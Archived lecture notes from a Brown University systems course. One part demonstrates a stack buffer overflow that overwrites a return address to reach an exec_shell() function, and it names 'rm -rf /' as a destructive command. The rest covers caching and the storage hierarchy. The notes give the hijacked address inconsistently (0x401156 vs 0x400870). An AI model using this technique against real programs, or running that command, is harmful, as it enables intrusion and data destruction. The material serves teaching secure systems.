CSCI 0300/1310: Fundamentals of Computer Systems

⚠️ This is not the current iteration of the course! Head here for the current offering.

Lecture 11: Buffer Overflow, Caching

» Lecture video (Brown ID required)
» Lecture code (Buffer overflow) – Lecture code (Caching)
» Post-Lecture Quiz (due 11:59pm Tuesday, March 8).

Buffer Overflow, contd.

Consider the code in checksummer.cc. This program computes checksums of strings provided to it as command line arguments. You don't need to understand in deep detail what it does, but observe that the checksum() function uses a 100-byte stack-allocated buffer (as part of the buf union) to hold the input string, which it copies into that buffer.

A sane execution of checksummer might look like this:

$ ./checksummer
hey yo CS300
<stdin>: checksum 00796568

But what if the user provides an input string longer than 399 characters (remember that we also need the zero terminator in the buffer)? The function just keeps writing, and it will write over whatever is adjacent to buf on the stack.

From our prior pictures, we know that buf will be in checksum's stack frame, below the entry %rsp. Moreover, directly above the entry %rsp is the return address! In this case, that is an address in main(). So, if checksum writes beyond the end of buf, will overwrite the return address on the stack; if it keeps going further, it will overwrite data in main's stack frame.

Why is overwriting the return address dangerous? It means that a clever attacker can direct the program to execute any function within the program. In the case of checksummer.cc, note the exec_shell() function, which runs a string as a shell command. This has a lot of nefarious potential – what if we could cause that function to execute with a user-provided string? We could print a lot of sad face emojis to the shell, or, more dangerously, run a command like rm -rf /, which deletes all data on the user's computer!

If we run ./checksummer.unsafe (a variant of checksummer with safety features added by mondern compilers to combat these attacks disabled), it behaves as normal with sane strings:

$ ./checksummer.unsafe
hey yo CS300
<stdin>: checksum 00796568

But if we pass a very long string with more than 400 characters, things get a bit more unusual:

$ ./checksummer.unsafe < austen.txt
Segmentation fault (core dumped)

The crash happens because the return address for checksum() was overwritten by garbage from our string, which isn't a valid address. But what if we figure out a valid address and put it in exactly the right place in our string?

This is what the input in attack.bytes does. Specifically, using GDB, I figured out that the address of exec_shell in my compiled version of the code is 0x401156 (an address in the code/text segment of the executable). attack.bytes contains a carefully crafted "payload" that puts the value 0x400870 into the right bytes on the stack. The attack payload is 424 characters long because we need 400 characters to overrun buf, 8 bytes for the base pointer, 4 bytes for the malicious return address, and 12 bytes of extra payload because stack frames on x86-64 Linux are aligned to 16-byte boundaries.

Executing this attack works as follows:

$ ./checksummer.unsafe < attack.bytes
OWNED OWNED OWNED

The < attack.bytes syntax simple pastes the contents of the attack.bytes file into the input to the program.

Caching and the Storage Hierarchy

We are now switching gears to talk about one of the most important performance-improving concepts in computer systems. This concept is the idea of cache memory.

Why are we covering this?

Caching is an immensely important concept to optimize performance of a computer system. As a software engineer in industry, or as a researcher, you will probably find yourself in countless situations where "add a cache" is the answer to a performance problem. Understanding the idea behind caches, as well as when a cache works well, is important to being able to build high-performance applications.

We will look at specific examples of caches, but a generic definition is the following: a cache is a small amount of fast storage used to speed up access to larger, slower storage.

One reasonable question is what we actually mean by "fast storage" and "slow storage", and why need both. Couldn't we just put all of the data on our computer into fast storage?

To answer this question, it helps to look at what different kinds of storage cost and how this cost has changed over time.

The Storage Hierarchy

When we learn about computer science concepts, we often talk about "cost": the time cost and space cost of algorithms, memory efficiency, and storage space. These costs fundamentally shape the kinds of solutions we build. But financial costs also shape the systems we build, and the costs of the storage technologies we rely on have changed dramatically, as have their capacities and speeds.

The table below gives the price per megabyte of different storage technology, in price per megabyte (2010 dollars), up to 2019. (Note that flash/SSD storage did not exist until the early 2000s, when the technology became available.)

Year	Memory (DRAM)	Flash/SSD	Hard disk
~1955	$411,000,000		$9,200
1970	$734,000.00		$260.00
1990	$148.20		$5.45
2003	$0.09	$0.305	$0.00132
2010	$0.019	$0.00244	$0.000073
2021	$0.003	$0.00008	$0.0000194

(Prices due to John C. McCallum, and inflation data from here. $1.00 in 1955 had "the same purchasing power" as $9.62 in 2019 dollars.)

Computer technology is amazing – not just for what it can do, but also for just how tremendously its cost has dropped over the course of just a few decades. The space required to store a modern smartphone photo (3 MB) on a harddisk would have costs tens of thousands of dollars in the 1950s, but now costs a fraction of a cent.

But one fundamental truth has remained the case across all these numbers: primary memory (DRAM) has always been substantially more expensive than long-term disk storage. This becomes even more evident if we normalize all numbers in the table to the cost of 1 MB of harddisk space in 2019, as the second table below does.

Year	Memory (DRAM)	Flash/SSD	Hard disk
~1955	219,800,000,000,000		333,155,000
1970	39,250,000,000		13,900,000
1990	7,925,000		291,000
2003	4,800	16,300	70
2010	1,000	130	3.9
2021	155	4.12	1

As a consequence of this price differential, computers have always had more persistent disk space than primary memory. Harddisks and flash/SSD storage are persistent (i.e., they survive power failiures), while DRAM memory is volatile (i.e., its contents are lost when the computer loses power), but harddisk and flash/SSD are also much slower to access than memory.

In particular, when thinking about storage performance, we care about the latency to access data in storage. The latency denotes the time it takes until data retrieved is available if read, or until it is on the storage medium if written. A longer latency is worse, and a smaller latency better, as a smaller latency means that the computer can complete operations sooner.

Another important storage performance metric is throughput (or "bandwidth"), which is the number of operations completed per time unit. Throughput is often, though not always, the inverse of latency. An ideal storage medium would habe low latency and high throughput, as it takes very little time to complete a request, and many units of data can be transferred per second.

In reality, though, latency generally grows, and throughput drops, as storage media are further and further away from the processor. This is partly due to the storage technologies employed (some, like spinning harddisks, are cheap to manufacture, but slow), and partly due to the inevitable physics of sending information across longer and longer wires.

The table below shows the typical capacity, latency, and throughput achievable with the different storage technologies available in our computers.

Storage type	Capacity	Latency	Throughput (random access)	Throughput (sequential)
Registers	~30 (100s of bytes)	0.5 ns	16 GB/sec (2x10⁹ accesses/sec)
SRAM (processor caches)	5 MB	4 ns	1.6 GB/sec (2x10⁸ accesses/sec)
DRAM (main memory)	8 GB	60 ns	100 GB/sec
SSD (stable storage)	512 GB	60 µs	550 MB/sec
Hard disk	2–5 TB	4–13 ms	1 MB/sec	200 MB/sec

This notion of larger, cheaper, and slower storage further away from the processor, and smaller, faster, and more expensive storage closer to it is referred to as the storage hierarchy, as it's possibly to neatly rank storage according to these criteria. The storage hierarchy is often depicted as a pyramid, where wider (and lower) entries correspond to larger and slower forms of storage.

This picture includes processor caches, which are small regions of fast (SRAM) memory that are on the processor chip itself. The storage hierarchy shows the processor caches divided into multiple levels, with the L1 cache (sometimes pronounced "level-one cache") closer to the processor than the L2, L3, and L4 caches. This reflects how processor caches are actually laid out, but we often think of a processor cache as a single unit.

Different computers have different sizes and access costs for these hierarchy levels; the ones in the table above are typical. Here are some more, based on Malte's MacBook Air from ca. 2013: a few hundred bytes of of registers; ~5 MB of processor cache; 8 GB primary memory; 256 GB SSD. The processor cache divides into three levels: 128 KB of total L1 cache, divided into four 32 KB components; each L1 cache is accessed only by a single processor core (which makes it faster, as cores don't need to coordinate). There are 256 KB of L2 cache, and there are 4 MB of L3 cache shared by all cores.

Each layer in the storage hierarchy acts as a cache for the following layer.

Finally, consider how the concept of caching abounds in everyday life, too. Imagine how life would differ without, say, fast access to food storage – if every time you felt hungry, you had to walk to a farm and eat a carrot you pulled out of the dirt. Your whole day would be occupied with finding and eating food! (Indeed, this is what some animals spend most of their time doing.) Instead, your refrigerator (or your dorm's refrigerator) acts as a cache for your neighborhood grocery store, and that grocery store acts as a cache for all the food producers worldwide.

Cache Structure

A generic cache is structured as follows.

The fast storage of the cache is divided into fixed-size slots. Each slot can hold data from slow storage, and is at any point in time either empty or occupied by data from slow storage. Each slot has a name (for instance, we might refer to "the first slot" in a cache, or "slot 0"). Slow storage is divided into blocks, which can occupy cache slots (so the cache slot size and the slow storage block size ought to be identical).

Each block on slow storage has an "address" (this is not a memory address! Disks and other storage media have their own addressing schemes). If a cache slot (in fast storage) is full, i.e., if it holds data from a block in slow storage, the cache must also know the address of that block.

In the contexts of specific levels in the hierarchy, slots and blocks are described by specific terms. For instance, a cache line is a slot in the processor cache (or, sometimes, a block in memory).

Cache Hits and Misses

Read caches must respond to user requests for data at particular addresses. On each access, a cache typically checks whether the specified block is already loaded into a slot. If it is, the cache returns that data; otherwise, the cache first loads the block into some slot, then returns the data from the slot.

A cache access is called a hit if the data accessed is already loaded into a cache slot, and can therefore be access quickly, and it's called a miss otherwise. Cache hits are good (they imply fast access), and cache misses are bad: they incur both the cost of accessing the cache and the cost of accessing the slower storage. Ideally, most accesses to the cache should be hits! In other words, we seek a high hit rate, where the hit rate is the fraction of accesses that hit.

For example, consider the arrayaccess.cc program. This program generates an in-memory array of integers and then iterates over it, summing the integers, and measures the time to complete this iteration. ./arrayaccess -u -i 1 10000000 runs through the array in linear, increasing order (-u), completes one iteration (-i 1), and uses an array of 10 million integers (ca. 40 MB).

Given that the array is in primary memory (DRAM), how long would we expect this to take? Let's focus on a specific part: the access to the first three integers in the array (i.e., array[0] to array[2]). If we didn't have a cache at all, accessing each integer would incur a latency of 60 ns (the latency of DRAM access). For the first three integers, we'd therefore spend 60 ns + 60 ns + 60 ns = 180 ns.

But we do have the processor caches, which are faster to access than DRAM! They can hold blocks from DRAM in their slots. Since no blocks of the array are in any processor cache at the start of the program, the access to the first integer still goes to DRAM and takes 60 ns. But this access will fetch a whole cache block, which consists of multiple integers, and deposit it into a slot of the L3 processor cache (and, in fact, the L2 and L1, but we will focus this example on the L3 cache). Let's assume the cache slot size is 12 bytes (i.e., three integers) for the example; real cache lines are often on the order of 64 or 128 bytes long. If the first access brings the block into the cache, the subsequent accesses to the second and third integers can read them directly from the cache, which takes about 4 ns per read for the L3 cache. Thus, we end up with a total time of 60 ns + 4 ns + 4 ns = 68 ns, which is much faster than 180 ns.

The principle behind this speedup is called locality of reference. Caching is based on the assumption that if a program accesses a location in memory, it is likely to access this location or an adjacent location again in the future. In many real-world programs, this assumption is a good one, as it is often true. In our example, we have spatial locality of reference, as access to array[0] is indeed soon after followed by accesses to array[1] and array[2], which are already in the cache.

By contrast, a totally random access pattern has no locality of reference, and caching generally does not help much with it. With our arrayaccess program, passing -r changes the access to be entirely random, i.e., we still access each integer, but we do so in a random order. Despite the fact that the program sums just as many integers, it takes much longer (on the order of 10x longer) to run! This is because it does not benefit from caching.

Cache Replacement

In our nice, linear arrayaccess example, the first access to the array brought the first block into the processor caches. Once the program hits the second block, that will also be brought into the cache, filling another slot, as will the third, etc. But what happens once all cache slots are full? In this situation, the cache needs to throw out an existing block to free up a slot for a new block. This is called cache eviction, and the way the cache decides which slot to free up is called an "eviction policy" or a "replacement policy".

What might a good eviction policy be? We would like the cache to be effective in the future, so ideally we want to avoid evicting a block that we will need shortly after. On option is to always evict the oldest block in the cache, i.e., to cycle through slots as eviction is needed. This is a round-robin, or first-in, first-out (FIFO) policy. Another sensible policy is to evict the cache entry that was least recently accessed; this is a policy called least recently used (LRU), and happens to be what most real-world caches use.

But what's the best replacement policy? Intuitively, it is a policy that always evicts the block that will be accessed farthest into the future. This policy is impossible to implement in the real world unless we know the future, but it is provably optimal (no algorithm can do better)! Consequently, this policy is called Bélády's optimal algorithm, named after its discoverer, László Bélády (the article).

It turns out that processors can sometimes make good guesses at the future, however. Looping linearly over a large array, as we do in ./arrayaccess -u, is such a case. The processor can detect that we are always accessing the neighboring block after the previous one, and it can speculatively bring the next block into memory while it still works on the summation for the previous block. This speculative loading of blocks into the cache is called prefetching. If it works well, prefetching can remove some of the 60 ns price of the first access to each block, as the block may already be in the cache when we access it!

Summary

Today, we saw an example of a buffer overflow and reviewed the layout of the stack.

We then talked about the notion of caching as a performance optimization at a high level; and we developed our understand of caches, why they are necessary, and why they benefit performance. We saw that differences in the price of storage technologies create a storage hierarchy with smaller, but faster, storage at the top, and slower, but larger storage at the bottom. Caches are a way of making the bottom layers appear faster than they actually are!

We then dove deeper into how your processor's cache, a specific instance of the caching paradigm, works and speeds up program execution. We found that accessing data already in the cache (a "hit") is much faster than accessing it on the underlying storage to bring the block into the cache (a "miss"). We also considered different algorithms for which slot to free up when the cache is full and a new block needs to be brought into the cache, and found the widely-used LRU algorithm as a reasonable predictor of future access patterns due to the locality of reference exhibited by typical programs.